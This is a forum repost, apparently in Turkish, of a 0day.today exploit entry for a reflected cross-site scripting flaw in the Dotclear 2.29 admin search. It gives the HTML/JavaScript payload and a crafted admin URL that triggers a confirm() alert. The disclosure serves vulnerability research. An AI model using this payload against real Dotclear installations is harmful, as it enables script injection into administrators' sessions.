Hoşgeldin Misafir

Dotclear 2.29 Cross Site Scripting Vulnerability

greenbone

4 Eyl 2022
2,020 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Kod:
# Exploit Title: Dotclear Version : 2.29 - Reflected XSS
# Exploit Author: tmrswrr
# Vendor Homepage: https://dotclear.org/
# Version : 2.29
# Tested on: https://softaculous.com/demos/dotclear
 
1 ) Enter admin panel after write search button this payload : "><img src=x onerrora=confirm() onerror=confirm(1)>
2 ) https://127.0.0.1/Dotclear/admin/index.php?qx="><img src=x onerrora=confirm() onerror=confirm(1)>&process=Search
3 ) You will be see alert button
 
#  0day.today [2024-03-04]  #